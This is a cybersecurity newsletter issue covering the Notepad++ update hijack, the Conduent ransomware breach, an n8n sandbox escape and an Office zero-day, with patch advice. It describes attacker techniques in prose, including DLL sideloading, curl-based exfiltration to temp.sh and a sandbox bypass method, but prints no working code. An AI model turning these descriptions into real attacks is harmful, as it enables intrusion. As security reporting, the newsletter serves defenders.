Sign in Subscribe

Notepad++ updates hijacked by Chinese state hackers

Chinese state-sponsored group Lotus Blossom hijacked Notepad++'s update mechanism for six months. Also: Conduent ransomware breach hits 25M+ Americans, critical n8n sandbox escape enables RCE, and a Microsoft Office zero-day is under active exploitation with a CISA KEV deadline of February 16.

william murray

5 min read

From The Bit Baker Daily Briefing — February 8, 2026

PLUS: Conduent breach exposes millions of Americans' benefits data, critical n8n flaws, and a Russian zero-day

Good morning, Dave. For six months, a Chinese state-sponsored group camped inside Notepad++'s update pipeline — pushing espionage payloads to handpicked government targets while millions of everyday users didn't notice a thing. Quiet. Surgical. Deeply unsettling.

In today's security Bit Baker:

  • Notepad++ update mechanism hijacked by Chinese APT Lotus Blossom
  • Conduent ransomware breach balloons to 25 million affected Americans
  • Critical n8n vulnerabilities let attackers run system commands via webhooks
  • Microsoft Office zero-day bypasses kill bit protections under active exploitation

Notepad++ Update Mechanism Hijacked in Six-Month Chinese Espionage Campaign

The Bit Baker: Chinese state-sponsored group Lotus Blossom broke into Notepad++'s shared hosting server and weaponized the WinGUP update mechanism to slip trojanized installers to government and financial targets across Southeast Asia — all between June and December 2025.

Unpacked:

  • Tracked under the aliases Lotus Blossom, Billbug, and Chrysalis, the attackers hijacked Notepad++'s WinGUP auto-updater to deliver malicious NSIS installers bundled with Cobalt Strike Beacons, sideloaded DLLs (log.dll), and Metasploit downloaders aimed at high-value targets in Vietnam, the Philippines, El Salvador, and Australia.
  • Reconnaissance payloads ran through AutoUpdater.exe and Lua scripts to fingerprint victim machines, quietly shipping data to temp.sh via curl.exe — because delivery was selective, the vast majority of Notepad++ users were never exposed, but that narrow targeting also made detection far harder.
  • Notepad++ has shipped v8.9.1 with XML signature validation for updates. IoCs are now available from Rapid7, Kaspersky, and Orca Security so organizations can sweep their environments for signs of compromise.

Bottom line: Few supply chain attacks have been this precise — a state-backed group embedded itself inside a trusted update pipeline for half a year, cherry-picking espionage targets while everyone else saw business as usual. If you're running Notepad++, update to v8.9.1 now and check for the published IoCs. Expect fresh scrutiny of how open-source projects secure their distribution channels.

Read the full deep dive →

Conduent Ransomware Breach Scope Balloons to 25 Million Americans

The Bit Baker: Government services contractor Conduent has confirmed that a ransomware attack stole personal data from far more Americans than initially disclosed. The verified victim count now tops 25.9 million across multiple state programs.

Unpacked:

  • Conduent handles Medicaid claims, child support payments, and SNAP benefits for over 100 million Americans. What got stolen? Names, Social Security numbers, health records, and financial data — and state attorneys general are still tallying the full victim count from affected programs.
  • The company admitted "a significant number of individuals' personal information" was taken but hasn't released a centralized accounting of exactly how many people across all states are affected, leaving millions uncertain whether their benefits data was compromised.
  • Breach-related costs are expected to hit at least $25 million through early 2026, covering notification, credit monitoring, and legal expenses from what's shaping up to be one of the largest govtech breaches on record.

Bottom line: Funneling sensitive government data through a handful of massive private contractors creates a single point of catastrophic failure — and when one contractor falls, millions of the most vulnerable people bear the consequences. If you partner with govtech providers, demand third-party security audits and incident notification SLAs before the next breach makes your data someone else's problem.

Read the full deep dive →

Critical n8n Flaw Lets Attackers Run System Commands Through Public Webhooks

The Bit Baker: A CVSS 9.4 vulnerability in n8n workflow automation (CVE-2026-25049) lets attackers escape the expression sandbox and run arbitrary system commands via workflows exposed through unauthenticated public webhooks — and here's the kicker: it's actually a bypass of a previous CVSS 9.9 fix.

Unpacked:

  • At the heart of the flaw is a TypeScript/JavaScript type mismatch: compile-time type enforcement simply doesn't apply to attacker-produced values at runtime, so malicious expressions slip past five separate security layers — regex checks, AST sanitization, and the original CVE-2025-68613 sandbox fix — using destructuring syntax and process.binding() calls.
  • Alongside this vulnerability, n8n disclosed 11 additional security flaws, five of them rated critical (CVSS 9.4), spanning command injection, file access, Git node exploitation, and Python sandbox escape — potentially exposing hundreds of thousands of enterprise AI and automation systems to complete takeover.
  • Patches ship in n8n versions 1.123.17 and 2.5.2. Organizations that can't update right away should lock down workflow creation to trusted users and kill public webhooks, per the official security bulletin.

Bottom line: When a single line of JavaScript can bypass the fix for a CVSS 9.9 flaw, it tells you just how brittle sandbox mechanisms really are — especially on platforms that evaluate user-supplied code by design. Anyone running n8n should treat this patch cycle as an emergency. Drop everything and update.

Read the full deep dive →

Microsoft Office Zero-Day Bypasses Kill Bit Protections Under Active Exploitation

The Bit Baker: Microsoft pushed an emergency out-of-band patch for CVE-2026-21509, a zero-day in Microsoft Office that bypasses OLE security mitigations to execute code through malicious documents. CISA has set a February 16 remediation deadline after confirming active exploitation in the wild.

Unpacked:

  • Rated CVSS 7.8, the flaw sidesteps the "kill bit" mechanism that's supposed to block dangerous COM objects. A malicious document can load Shell.Explorer.1 — an embedded Internet Explorer control — without triggering macro warnings or "Enable Content" prompts, handing attackers code execution the instant a victim opens the file.
  • Every major Office version is in the blast radius: Office 2016, 2019, LTSC 2021, LTSC 2024, and Microsoft 365 Apps for Enterprise. Exploitation so far has been targeted rather than widespread, pointing to sophisticated threat actors with specific objectives.
  • Office 2021 and later pick up automatic server-side protection after an app restart. Running Office 2016 or 2019? You'll need specific patches (KB5002713 for 2016) or a registry-based kill bit workaround to bridge the gap until February Patch Tuesday delivers the permanent fix.

Bottom line: Silent code execution on document open — no macros, no prompts, nothing. That's the nightmare scenario, and the broad version coverage means practically every organization running Microsoft Office is exposed. Patch now or apply the kill bit workaround. The CISA KEV deadline is eight days out.

Read the full deep dive →

The Shortlist

Substack confirmed a data breach that exposed user email addresses and phone numbers after an unauthorized third party accessed platform data back in October 2025. The company didn't discover the intrusion until early February 2026 — a four-month blind spot.

Ransomware actors are hammering CVE-2026-24423 in SmarterMail and CVE-2025-22225 in VMware ESXi. CISA has added the SmarterMail flaw to the KEV catalog for the third time in two weeks, and 267 fresh ransomware victims have surfaced this month alone.

Security researchers found a new EDR killer malware abusing a decade-old EnCase forensics driver — its certificate was revoked over 10 years ago but still loads on Windows — capable of disabling 59 endpoint security products.

References

  1. Help Net Security: Notepad++ supply chain attack IOCs and targets
  2. Arctic Wolf: Notepad++ publishes full details of 2025 compromise
  3. Tenable: FAQ about Notepad++ supply chain compromise
  4. ThreatLocker: Notepad++ trojanized updates in suspected nation-state attack
  5. Notepad++ official incident report
  6. TechCrunch: Conduent data breach balloons affecting millions more Americans
  7. HIPAA Journal: Conduent victim count swells to over 25M
  8. WebProNews: Inside the Conduent data breach
  9. The Hacker News: Critical n8n flaw CVE-2026-25049
  10. SecureLayer7: CVE-2026-25049 technical analysis
  11. Pillar Security: n8n sandbox escape exposes enterprise AI systems
  12. n8n community: Security bulletin February 6, 2026
  13. Orca Security: CVE-2026-21509 Microsoft Office zero-day analysis
  14. XM Cyber: Microsoft Office zero-day vulnerability
  15. Malwarebytes: Office zero-day lets documents slip past security
  16. TechCrunch: Substack confirms data breach
  17. Help Net Security: Ransomware exploiting SmarterMail and VMware ESXi
  18. Help Net Security: EDR killer malware and week in review

Sign up for more like this.

Enter your email
Subscribe